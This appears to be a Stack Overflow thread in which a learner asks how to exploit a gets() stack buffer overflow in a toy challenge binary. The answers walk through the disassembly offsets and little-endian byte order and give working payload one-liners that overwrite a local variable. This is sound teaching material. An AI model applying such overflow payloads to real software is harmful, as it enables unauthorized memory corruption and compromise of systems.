This is an extract from a binary that is vulnerable to a buffer overflow. I decompiled it with Ghidra.

  char local_7 [32];
  long local_78;

  printf("Give it a try");
  gets(local_7);
  if (local_78 != 0x4141414141414141) {
    if (local_78 == 0x1122334455667788) {
      puts("That's won");
    }
    puts("Let's continue");
  }

I'd like to understand why a buffer overflow is possible here.
I looked up the hex value "0x4141414141414141" and saw that it corresponds to a string of "A" characters. But what exactly do the conditions on "0x4141414141414141" and "0x1122334455667788" do? And more precisely, what input could the user give to get the "That's won" message?
Any explanations would be greatly appreciated, thanks!

___EDIT___
I should add that I see these two hex values when using the "disas main" command:

0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax  
0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax  
0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax

I tried a buffer overflow using python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./myBinary.
But I always get the "Let's continue" message. I'm not far from the solution, but I guess I'm missing something. Could you tell me what?

___EDIT 2___ Before the gets :

  char local_7 [40];
  long local_78;
  
  local_78 = 0x4141414141414141;
  printf("Give it a try");
  fflush(stdout);
  gets(local_7);
  [... and so on]
Julien
  • `gets` is always dangerous, and the answer to your question is probably processor specific. Check the instruction set relevant to it – Basile Starynkevitch Apr 30 '21 at 20:25
  • `gets` will just continue reading and writing as long as there is input. So if the user enters more than 32 characters, `local_7` will overflow. You'll have to enter whatever 0x1122334455667788 is in ASCII after 32 other bytes to "win". – Emanuel P Apr 30 '21 at 22:16
  • @Emanuel Thank you very much for your answer. Does that mean the user has to enter 64 characters to overflow? Also, I looked up the conversion of __0x1122334455667788__ to ASCII and got something strange, with characters that are not displayed. Could you tell me what I'm doing wrong? – Julien May 01 '21 at 13:30
  • I should add that I see the following lines when using the "disas main" command: ```0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax``` / ```0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax``` / ```0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax``` – Julien May 01 '21 at 15:27
  • I gave it a try with ```python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./myBinary``` but I always get the "Let's continue" message. I'm not far from the solution, but I guess I'm missing something. – Julien May 01 '21 at 16:46
  • Likely [Why is the gets function so dangerous it should never be used](https://stackoverflow.com/q/1694036/3422102) (at least a smart compiler will flag it -- and it has been completely removed from C11) – David C. Rankin May 03 '21 at 09:58

2 Answers

Here is the full disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000001189 <+0>:     endbr64 
   0x000000000000118d <+4>:     push   %rbp
   0x000000000000118e <+5>:     mov    %rsp,%rbp
   0x0000000000001191 <+8>:     sub    $0x30,%rsp
   0x0000000000001195 <+12>:    lea    0xe68(%rip),%rdi        # 0x2004
   0x000000000000119c <+19>:    mov    $0x0,%eax
   0x00000000000011a1 <+24>:    callq  0x1080 <printf@plt>
   0x00000000000011a6 <+29>:    lea    -0x30(%rbp),%rax
   0x00000000000011aa <+33>:    mov    %rax,%rdi
   0x00000000000011ad <+36>:    mov    $0x0,%eax
   0x00000000000011b2 <+41>:    callq  0x1090 <gets@plt>
   0x00000000000011b7 <+46>:    movabs $0x4141414141414141,%rax
   0x00000000000011c1 <+56>:    cmp    %rax,-0x8(%rbp)
   0x00000000000011c5 <+60>:    je     0x11ef <main+102>
   0x00000000000011c7 <+62>:    movabs $0x1122334455667788,%rax
   0x00000000000011d1 <+72>:    cmp    %rax,-0x8(%rbp)
   0x00000000000011d5 <+76>:    jne    0x11e3 <main+90>
   0x00000000000011d7 <+78>:    lea    0xe34(%rip),%rdi        # 0x2012
   0x00000000000011de <+85>:    callq  0x1070 <puts@plt>
   0x00000000000011e3 <+90>:    lea    0xe33(%rip),%rdi        # 0x201d
   0x00000000000011ea <+97>:    callq  0x1070 <puts@plt>
   0x00000000000011ef <+102>:   mov    $0x0,%eax
   0x00000000000011f4 <+107>:   leaveq
   0x00000000000011f5 <+108>:   retq

The relevant stack offsets can be read from the instruction that loads the address of local_7 as the argument to gets:

   0x00000000000011a6 <+29>:    lea    -0x30(%rbp),%rax

and the cmp instruction comparing the local_78 variable.

   0x00000000000011c1 <+56>:    cmp    %rax,-0x8(%rbp)

As you can see, local_7 is at -0x30(%rbp) and local_78 is at -0x8(%rbp), which is 0x30 - 0x8 = 0x28, exactly 40 bytes after the start of the buffer.
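The same arithmetic can be written out as a quick check. This is only a sketch; the names `buf_offset`, `var_offset` and `padding` are made up for illustration, and the offsets are the ones read from the disassembly above.

```python
# Offsets relative to %rbp, taken from the disassembly above.
buf_offset = -0x30   # lea -0x30(%rbp),%rax  -> start of local_7
var_offset = -0x08   # cmp %rax,-0x8(%rbp)   -> local_78

# Number of bytes gets() has to write before it reaches local_78.
padding = var_offset - buf_offset
print(padding)  # 40
```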

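Your Python command is not correct. Apart from using 32 bytes of padding instead of 40, it builds a str and passes it to print(), which encodes the text on output (normally as UTF-8). The character '\x88' is therefore emitted as two bytes, and print() also appends a newline: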

$ python3 -c "print ('A' * 40 +'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000010  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  c2 88 77 66 55 44 33 22  |AAAAAAAA..wfUD3"|
00000030  11 0a                                             |..|
00000032

Notice the c2 byte before 88. See the following question for details: Why is the output of print in python2 and python3 different with the same string?
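The extra byte can be reproduced without running the binary at all. The snippet below is a small illustration (the variable names are mine) of how Python 3 treats the str '\x88' compared with the bytes literal b'\x88', assuming the output encoding is UTF-8.

```python
# In a str, '\x88' is the code point U+0088, not the raw byte 0x88.
as_text = '\x88'.encode('utf-8')   # what print() sends to a UTF-8 stdout
as_bytes = b'\x88'                 # a bytes literal holds the raw byte itself

print(as_text.hex())   # c288
print(as_bytes.hex())  # 88
```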

If we instead build a bytes object and write it directly to sys.stdout.buffer, we get the correct output:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000010  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  88 77 66 55 44 33 22 11  |AAAAAAAA.wfUD3".|
00000030

Using this input, we get the "That's won" message:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|./a.out 
Give it a tryThat's won
Let's continue
mkayaalp
  • Thank you very much for your explanation, in particular the difference between string and bytes types. But that's strange: I tried to paste ```AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.wfUD3".``` after the question asked by the binary and it returns ```Let's continue``` instead of ```That's won```. Do you know why? – Julien May 03 '21 at 13:17
  • You can't copy and paste the string output of `hd`, since it replaces non-ASCII and non-printable bytes with a `.`. `88` is not valid ASCII and `11` is vertical tab. – mkayaalp May 03 '21 at 13:23
  • Ok, got it. So, if I run the binary and want to answer the question, I have to paste ```python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"```, right? I tried it but the binary returns ```Let's continue``` and ```Segmentation fault (core dumped)``` – Julien May 03 '21 at 13:28
  • No. That would write the command `python3 -c ...` literally into the buffer. You are not going to be able to copy paste your exploit in general. In this case, your clipboard will drop `88` since it is not valid UTF-8, and your terminal will eat `11` since it is a control character (it's actually DC1, not vertical tab). That's why we use pipe instead. – mkayaalp May 03 '21 at 14:09
  • Ok, thanks again. Now I wrote ```python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./myBinary ``` but it returns nothing except the initial question ```Give it a try```... – Julien May 03 '21 at 14:19
  • Does your binary accept any other input before the `gets`? – mkayaalp May 03 '21 at 14:27
  • See ___EDIT 2___ in my first post – Julien May 03 '21 at 14:37

This binary is vulnerable to a buffer overflow because it uses the gets() function, which is inherently unsafe and was deprecated, then removed from the C standard in C11, for that reason.

It copies the user input into the buffer it is given without checking the size of that buffer. So, if the user's input is larger than the available space, it overflows in memory and can overwrite other variables or structures located after the buffer.

That is the case for the long local_78; variable, which sits on the stack after the buffer, so we can potentially overwrite its value.

To do so, we need to pass an input that is:

  • at least 32 bytes, to fill the actual buffer. (A char, i.e. an ASCII character, is normally 1 byte.)
  • plus a variable number of additional bytes to fill the space between the buffer and the long variable (compilers often add padding or place other variables between the two, even if we haven't declared anything there in the code. The stack is a dynamic memory region, so its layout often cannot be predicted with 100% certainty)
  • plus 8 bytes, which is the size of a long on 64-bit Linux (it can differ on other platforms, but let's assume this is x86-64). This is the value we will overwrite the variable with.

We don't care what we put in the first 32+X bytes, except that they must not contain a newline, because gets() stops reading at the first newline. The program then checks local_78 for a special value, and if that check passes, it executes puts("That's won");, telling you that you have "won", that is, successfully exploited the program and overwritten the memory.
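To make the mechanism concrete, here is a toy model of the stack frame in Python. It is only a sketch under stated assumptions: the frame is modelled as a 40-byte buffer immediately followed by the 8-byte local_78 (that is, 32 + X with X = 8, the distance the disassembly in the other answer suggests), the machine is little-endian, and `simulate` and `BUF_SIZE` are hypothetical names. It does not touch real memory.

```python
import struct

BUF_SIZE = 40  # assumed distance from local_7 to local_78 (hypothetical layout)

def simulate(user_input: bytes) -> list:
    """Model gets() writing into a frame laid out as [buffer][local_78]."""
    # local_78 starts out as 0x4141414141414141, as in the decompiled code.
    frame = bytearray(BUF_SIZE) + struct.pack('<Q', 0x4141414141414141)

    # gets() copies everything up to the first newline and appends a NUL,
    # without ever checking the size of the destination buffer.
    data = user_input.split(b'\n', 1)[0] + b'\x00'

    # The toy frame ends after local_78, so clamp the copy to stay inside it.
    n = min(len(data), len(frame))
    frame[:n] = data[:n]

    # Read local_78 back as a little-endian unsigned 64-bit integer.
    (local_78,) = struct.unpack_from('<Q', frame, BUF_SIZE)

    messages = []
    if local_78 != 0x4141414141414141:
        if local_78 == 0x1122334455667788:
            messages.append("That's won")
        messages.append("Let's continue")
    return messages

print(simulate(b'hello'))
print(simulate(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11'))
```

A short input leaves local_78 untouched, so nothing is printed by the checks, while 40 filler bytes followed by the eight target bytes reach both messages. In this model, exactly 40 filler bytes alone already change local_78, because the terminating NUL lands on its lowest byte.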

The problem here is that the required value is 0x1122334455667788 (again, a long, which is 8 bytes). We can split it into its bytes, 0x11 0x22 0x33 0x44 0x55 0x66 0x77 0x88, and look up which ASCII character each byte corresponds to. Because x86-64 is little-endian, the bytes have to be sent least significant first: 0x88 0x77 0x66 0x55 0x44 0x33 0x22 0x11. The issue is that bytes like 0x11 and 0x88 are not printable ASCII characters, so you cannot type them directly into the console: a normal keyboard has no key that inputs 0x11, as it has no visual representation. You will need an additional program to deliver the input, using whatever mechanism the operating system offers for passing raw bytes. On Linux, for example, this can be done using pipes or output redirection.
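As an illustration, the input can be assembled with Python's struct module instead of writing the bytes out by hand. This is a minimal sketch: `PADDING` and `TARGET` are names chosen here, and the padding of 40 bytes is an assumption that has to match the actual distance between the buffer and local_78 in your binary.

```python
import struct

PADDING = 40                  # assumed distance from the buffer to local_78
TARGET = 0x1122334455667788   # value the program compares local_78 against

# '<Q' packs an unsigned 64-bit integer in little-endian byte order,
# so the least significant byte (0x88) comes first.
payload = b'A' * PADDING + struct.pack('<Q', TARGET)

# Show the raw bytes as hex to confirm the order before using them.
print(payload[PADDING:].hex())  # 8877665544332211
```

To feed the payload to the program, write it as raw bytes (for example with sys.stdout.buffer.write(payload)) and pipe the output of the script into the binary, rather than printing it as text or pasting it into the terminal.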

78dtat78da